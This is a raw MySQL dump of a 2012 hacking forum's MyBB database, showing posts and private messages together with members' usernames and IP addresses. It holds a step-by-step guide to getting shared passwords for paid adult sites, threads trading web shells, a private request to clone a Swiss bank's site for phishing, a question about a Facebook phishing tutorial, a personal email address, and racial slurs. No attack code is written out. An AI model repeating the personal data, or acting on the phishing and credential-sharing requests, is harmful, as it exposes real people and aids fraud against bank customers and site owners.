`icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7528', '1118', '6503', '9', 'RE: ? ? ADFOC.US VIEWS ? FAST ?CHEAP ? ?', '0', '82', 'iTzIpod', '1352769433', '@VirtualLegend, my account got a warning (\"Red Flag\")', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'b629fef9ff99cb5297fb470e36c4bd57', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7529', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '346', 'TheBlueCat97', '1352769785', 'I\'ve never had a toothache #perfectteeth are you jelly?', '70.174.59.159', '1185823647', '1', '0', '0', '0', '1', '5f9262e03d84c18568d58df20d6e8c7b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7530', '1093', '6341', '7', 'RE: I\'m back', '0', '346', 'TheBlueCat97', '1352770004', 'Lol, I only know you from nodus, well welcome back :D', '70.174.59.159', '1185823647', '1', '0', '0', '0', '1', '52a2de297497138a535807bf618bb9a1', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7531', '1207', '7133', '35', 'RE: Rate these logos', '0', '222', 'Exposé', '1352770071', 'I like the first one the best that one is really cool :D', '74.67.7.114', '1245906802', '1', '0', '0', '0', '1', '53adfb7061e7baa5c9cf0396853f3cff', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7533', '1176', '6870', '47', 'RE: Free .asia domain', '0', '346', 'TheBlueCat97', '1352770341', 'Cool, nice find. Seen it though.', '70.174.59.159', '1185823647', '1', '0', '0', '0', '1', '860b34b7dace2fb618129a75558f8cb3', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7534', '1207', '7133', '35', 'RE: Rate these logos', '0', '82', 'iTzIpod', '1352770510', 'Thanks for your feedback :)', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '7c2443703af83859026300f0be70a628', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7535', '1258', '0', '47', 'eBook Givaway!', '0', '346', 'TheBlueCat97', '1352770535', 'Ok, so I am going to do a giveaway to a lucky 3 people! The person(s) to butt kiss up the best to me will get the lot of eBooks and more! so what are you waiting for?! go and kiss up!', '70.174.59.159', '1185823647', '1', '0', '0', '0', '1', 'f83ae0f68220a963e72e4883db99af75', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7536', '1253', '7481', '7', 'RE: Who\'s had a Toothache?', '0', '82', 'iTzIpod', '1352771268', 'Welcome to the forum ^ I recommend you make an introduction thread. Also, in your signature, you didn\'t include your Youtube. :p How are we supposed to subscribe to you then? OT: I\'m gonna get braces.', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', 'd7726ae3659dce55d7675f1c686d55e2', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7537', '1258', '7535', '47', 'RE: eBook Givaway!', '0', '82', 'iTzIpod', '1352771422', 'What kind of eBooks are they? Also, By butt kiss, you mean..', '24.212.197.164', '416597412', '1', '0', '0', '0', '1', '6c515138685e016af8f7de8edc4a864b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7538', '1211', '7170', '18', 'RE: Facebook Blaster Pro v10.0', '0', '306', 'CommandoModz', '1352771602', 'Hahaha, thanks man a lot man!!!!!!!!!!!!!', '184.6.224.250', '-1207508742', '0', '0', '0', '0', '1', 'aee62ecf6712134bc7192035d1ae682a', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7539', '1256', '7513', '3', 'RE: Recent Downtime and Forced to change password', '0', '1', 't3h jok3r', '1352783904', 'Not after what just took place. I would say around 2 weeks more but I don\'t make fake promises. Updated thread with new information.', '72.231.24.165', '1223104677', '1', '0', '0', '0', '1', '203d1a17ec235fe0b520e485eb069db0', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7540', '1259', '0', '4', 'Centagon here!', '0', '334', 'Centagon', '1352785654', 'Hello, I am new here obviously :P I like to mod games, such as the cod series. I was working on something for BO2 but I didn\'t get it early enough. I got it 2 weeks ago, and it wasn\'t long enough for me to have time to inspect anything. Uhm, my skills. I am decent with SQLi, Good with XSS, I don\'t deface sites (Sometimes), I will just search the site for some useful information. I don\'t boot people, I don\'t dox people. I think doxing people is just really annoying and immature, I think booting people is okay, but not cool to do. You may know me on other forums as \'Raz0r\' or \'Centagon\' or \'r4z0rz\'.', '107.205.69.168', '1808614824', '0', '0', '334', '1352785688', '1', '8b6dafb55acf06f39b679255b4e5e9ce', '0', '1352785688'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7541', '1260', '0', '7', 'Post your setup!', '0', '334', 'Centagon', '1352785934', 'I like threads like this so I\'ll go first. [spoiler] [img]http://i.imgur.com/rDHi3.jpg[/img] [img]http://i.imgur.com/xgsdU.jpg[/img] [img]http://i.imgur.com/XH7Pb.jpg[/img] [img]http://i.imgur.com/Opio2.jpg[/img][/spoiler]', '107.205.69.168', '1808614824', '0', '0', '0', '0', '1', 'f9a7e02a92bb1be8388a0a0b55f42300', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7542', '1239', '7323', '84', 'RE: 800 shells', '0', '54', 'Sin Cara', '1352788517', 'Thanks for the share :) Keep posting HQ stuff.', '119.154.82.157', '2006602397', '1', '0', '0', '0', '1', '5ababf9c79aeae0c5a49e20922293fdf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7543', '1261', '0', '29', 'How to get free XXX passwords! [EASY]', '0', '62', 'R?????zo?', '1352799074', 'Sorry if it\'s hard to understand but i would love to share with you! We all have wanted those brazzers or mofos accounts that have the best HD porn! LOL [lock] First head over to [url=http://golden-joint.com/]Golden-Joint![/url] [spoiler][img]http://gyazo.com/5aab47fbaa9c3e68cbb42149cf22008e.png?1352153616[/img][/spoiler] You are going to want to register! [spoiler][img]http://gyazo.com/46e06923739766a9772796bde2174c3d.png?1352153669[/img][/spoiler] Once you have registered you will have to confirm the link in your email, and login. You will then want to scroll down to the XXX section and click passwords! [spoiler][img]http://gyazo.com/a407938e109b5707c0b6d7b390a31a54.png?1352154203[/img][/spoiler] You will then see \'THE BEST 50\' , you will want to click that. It will ask to vote or whatever just hit no. [spoiler][img]http://gyazo.com/ee47d50954e9f70b8a7246a4337a8d9c.png?1352154300[/img][/spoiler] You will see this box, then you will have to search for the password which is \"Zombie\" currently. [spoiler][img]http://gyazo.com/992a3ab06691e9e5da262c4a1fb0ef1a.png?1352154358[/img][/spoiler] Copy it, then go back to the page you were on that said \'THE BEST 50\' and put the password in. You have gained access and you can find all the porn passwords you would like! [spoiler][img]http://gyazo.com/8265014414bb0f04d02f0935f72544e4.png?1352154496[/img][/spoiler] Please say thank you, or whatever. It took me a while to make this. Just thought i would share :D [/lock]', '188.140.117.178', '-1131645518', '1', '0', '62', '1352799126', '1', '8ec90f9bc317183c261c8389daab03ee', '0', '1352799126'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7544', '1261', '7543', '29', 'RE: How to get free XXX passwords! [EASY]', '0', '54', 'Sin Cara', '1352799136', 'Thanks for the share mate :)', '119.154.64.80', '2006597712', '1', '0', '0', '0', '1', 'd4d2cbe5cd7b68cceb2e2b2c65b6f697', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7545', '1258', '7535', '47', 'RE: eBook Givaway!', '0', '346', 'TheBlueCat97', '1352804815', 'The eBooks that I\'m giving away are a wide variety, you may get all of them depending on what place you get in(first, second, third). And what I mean by \"kissing up\" I mean telling me I\'m cool and stuff like that. Get it? [hr] oh, sorry, the eBooks. Minecraft, hacking, portforwarding, money, etc,...', '70.174.59.159', '1185823647', '1', '0', '346', '1352805149', '1', '690ebeafa3a5e01b898bf2284090fbaf', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7546', '1256', '7513', '3', 'RE: Recent Downtime and Forced to change password', '0', '205', 'mothered', '1352809091', 'It\'s beneficial to share what happened, just like you\'ve done so here. Thanks for the Info.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', 'd22f9304cdc0c22b43891975bdee7a49', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7547', '1254', '7482', '65', 'RE: Who\'s watched The Social Network movie?', '0', '205', 'mothered', '1352809466', 'Appreciate the response guys. I shall dedicate some time to watch It. Cheers.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '862b3c45a217180bb653a957bad53440', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7548', '1259', '7540', '4', 'RE: Centagon here!', '0', '205', 'mothered', '1352809844', 'I have seen you under the name of Raz0r on other forums. Welcome aboard mate, and enjoy your stay.', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '011795560e8a971c362c61c629d53bac', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7549', '1238', '7322', '67', 'RE: Slowlowirs Shell .PHP file', '0', '205', 'mothered', '1352809997', 'Let\'s see what this Is about...', '210.50.40.19', '-768464877', '1', '0', '0', '0', '1', '7a1df7e2a42bc31843d7421a18a7ae2b', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7550', '1256', '7513', '3', 'RE: Recent Downtime and Forced to change password', '0', '222', 'Exposé', '1352814806', 'Glad we are back up and running....:D', '74.67.7.114', '1245906802', '1', '0', '0', '0', '1', 'b9199c0c30d957f61bec61bb7baf9970', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7551', '1238', '7322', '67', 'RE: Slowlowirs Shell .PHP file', '0', '67', 'HoverCatz', '1352820202', 'thanks for this :)', '178.74.57.144', '-1303758448', '1', '0', '0', '0', '1', '8464d3146068f65397d2c6a332c5af00', '0', '0'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7552', '1239', '7323', '84', 'RE: 800 shells', '0', '67', 'HoverCatz', '1352820667', 'thanks for this :)', '178.74.57.144', '-1303758448', '1', '0', '67', '1352821070', '1', '5bfd911fa81907a2faa14aa9c2060336', '0', '1352821070'); INSERT INTO `mybb_posts` (`pid`, `tid`, `replyto`, `fid`, `subject`, `icon`, `uid`, `username`, `dateline`, `message`, `ipaddress`, `longipaddress`, `includesig`, `smilieoff`, `edituid`, `edittime`, `visible`, `posthash`, `disableeditedby`, `edittime2`) VALUES ('7553', '1256', '7513', '3', 'RE: Recent Downtime and Forced to change password', '0', '150', 'MinecraftGeek', '1352823143', 'At least they didn\'t get your account info and it\'s good to see the site back up. I found out through the email you sent out.', '81.151.0.106', '1368850538', '0', '0', '0', '0', '1', '47f6a516d728e37f673c63522ef330fa', '0', '0'); UNLOCK TABLES; DROP TABLE IF EXISTS `mybb_privatemessages`; CREATE TABLE `mybb_privatemessages` ( `pmid` int(10) unsigned NOT NULL AUTO_INCREMENT, `uid` int(10) unsigned NOT NULL DEFAULT '0', `toid` int(10) unsigned NOT NULL DEFAULT '0', `fromid` int(10) unsigned NOT NULL DEFAULT '0', `recipients` text NOT NULL, `folder` smallint(5) unsigned NOT NULL DEFAULT '1', `subject` varchar(120) NOT NULL DEFAULT '', `icon` smallint(5) unsigned NOT NULL DEFAULT '0', `message` text NOT NULL, `dateline` bigint(30) NOT NULL DEFAULT '0', `deletetime` bigint(30) NOT NULL DEFAULT '0', `status` int(1) NOT NULL DEFAULT '0', `statustime` bigint(30) NOT NULL DEFAULT '0', `includesig` int(1) NOT NULL DEFAULT '0', `smilieoff` int(1) NOT NULL DEFAULT '0', `receipt` int(1) NOT NULL DEFAULT '0', `readtime` bigint(30) NOT NULL DEFAULT '0', PRIMARY KEY (`pmid`), KEY `uid` (`uid`,`folder`), KEY `toid` (`toid`) ) ENGINE=MyISAM AUTO_INCREMENT=4130 DEFAULT CHARSET=utf8; LOCK TABLES `mybb_privatemessages` WRITE; INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('2', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'WASSSUP', '0', 'PENIS IN THE BUTT :P hey', '1340038587', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('5', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: WASSSUP', '0', 'undefined', '1340038729', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('8', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'bitch ass nigga', '0', 'wssup homie', '1340039908', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('31', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Annoying ', '0', '[img]http://speedcap.net/img/59bca508ffd824229b6fffa835ee268d/0faf3859.png[/img] How do I fix it?', '1343925220', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1333', '61', '1', '61', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Congratulations', '0', '[quote=\'t3h jok3r\'] Congratz on becoming Staff NXK. Have a look at our [url=http://l33thacking.com/forumdisplay.php?fid=5]Staff[/url] Forum and have a look at the following threads and try to learn and understand our staff rules & regulations including instructions and moderation actions. [b]Useful and recommend threads[/b] [url=http://l33thacking.com/showthread.php?tid=10]How to moderate LH[/url] [url=http://l33thacking.com/showthread.php?tid=331]New Rules and Instructions[/url] [url=http://l33thacking.com/showthread.php?tid=327]Staff Mycode[/url] [/quote] Thanks man. Ill do my best :)', '1346902046', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('1329', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Staff', '0', '[quote=\'t3h jok3r\'] I\'m promoted NXK to staff. Couldn\'t talk this out, reasons as follow. JakeUS said that he can\'t be staff anymore because of schools but he will be active but not active enough to handle reports in future. iTzIpod is 15- plus as he said that he will be busy with school and he lives outside of US so NXK was the only one left to promote and he even agreed. I can\'t make you a Staff lol. [/quote] Staff is better then admin?', '1346900989', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('42', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Members', '0', 'If you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time. ', '1344297135', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('46', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Members', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] If you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time. [/quote] Thanks, honestly I am looking for advertisers and some good sites to advertise on. How much would he charge without your cut? Don\'t worry about your commission. [/quote] I\'m not sure, I will ask him.', '1344369080', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('49', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Members', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] If you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time. [/quote] Thanks, honestly I am looking for advertisers and some good sites to advertise on. How much would he charge without your cut? Don\'t worry about your commission. [/quote] I\'m not sure, I will ask him. [/quote] Thanks. By the way, how is the new theme? [/quote] I like it better then the old one. ', '1344369419', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('52', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Members', '0', '[quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] [quote=\'t3h jok3r\'] [quote=\'JakeUS\'] If you want more active members, you can possibly pay a person I know to advertise this forum on his. It has over 1.7k members and over 70 users online at a time. [/quote] Thanks, honestly I am looking for advertisers and some good sites to advertise on. How much would he charge without your cut? Don\'t worry about your commission. [/quote] I\'m not sure, I will ask him. [/quote] Thanks. By the way, how is the new theme? [/quote] I like it better then the old one. [/quote] Thanks, I\'m still working on it. [/quote] Are you looking for an affiliate banner on the other site advertising this one?', '1344370611', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('58', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\'] Yo sup, long time no see. [/quote] Hey, sorry still on vacation :3 and finally at a place with wifi that works longer then 20 seconds before kicking me off. :/ How have you been?', '1344479123', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('61', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Yo sup, long time no see. [/quote] Hey, sorry still on vacation :3 and finally at a place with wifi that works longer then 20 seconds before kicking me off. :/ How have you been? [/quote] No problem, enjoy your vacation. I\'m good and you? [/quote] Good vacation but I am at a bad moment right now a family member is sick.', '1344571644', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('64', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] [quote=\'Apathy\'] [quote=\'t3h jok3r\'] Yo sup, long time no see. [/quote] Hey, sorry still on vacation :3 and finally at a place with wifi that works longer then 20 seconds before kicking me off. :/ How have you been? [/quote] No problem, enjoy your vacation. I\'m good and you? [/quote] Good vacation but I am at a bad moment right now a family member is sick. [/quote] Damn, get well soon. I don\'t know why, but me and my father has caught a flu. [/quote] That sucks and thanks:) Get better! ;)', '1344688327', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('66', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Hey', '0', 'Can you make a paypal account and put 1$ in it? Then tll me the account info?', '1344785246', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('70', '2', '1', '2', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hey', '0', '[quote=\'t3h jok3r\'] [quote=\'Apathy\'] Can you make a paypal account and put 1$ in it? Then tll me the account info? [/quote] I don\'t get it, why? P.S: I\'m really sick and have a high fever, I would like you to please take care of the site for the next two days. [/quote] Sure also I need it because I have a exploit that I am going to use it with.', '1344821880', '0', '1', '0', '0', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('72', '20', '1', '20', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: So', '0', '[quote=\'t3h jok3r\'] I\'m sick atm and would like you to POST content or at least reply to threads. You are the only staff now because I have now demoted Hil. [/quote] Okay, I will.', '1344827591', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('125', '53', '54', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"54\";}}', '2', 'Question', '0', 'Hey Sin Cara Im not sure if im allowed to make a tutorial for a facebook phishing page. So i wanna ask if i am allowed to do that tutorial. Im asking this because it said somewhere no blackhat activities ... Thx and regards', '1345056646', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('128', '53', '1', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:1:\"1\";}}', '2', 'Re: Hi', '0', '[quote=\'t3h jok3r\'] Hi, hope you are liking L33T Hacking so far. If you have any questions, feel free to ask. [/quote] yeah its great, i love it i just want to ask if im allowed to make a facebook phishing website tutorial. Regards ', '1345059263', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('137', '53', '64', '53', 'a:1:{s:2:\"to\";a:1:{i:0;s:2:\"64\";}}', '2', 'phishing', '0', 'can you make a copy of this website ? https://www.postfinance.ch/ my email : phonomarco@yahoo.de thanks alot', '1345112832', '0', '1', '0', '1', '0', '0', '0'); INSERT INTO `mybb_privatemessages` (`pmid`, `uid`, `toid`, `fromid`, `recipients`, `folder`, `subject`, `icon`, `message`, `dateline`, `deletetime`, `status`, `statustime`, `includesig`, `smilieoff`, `receipt`, `readtime`) VALUES ('139', '64', '53', '64', 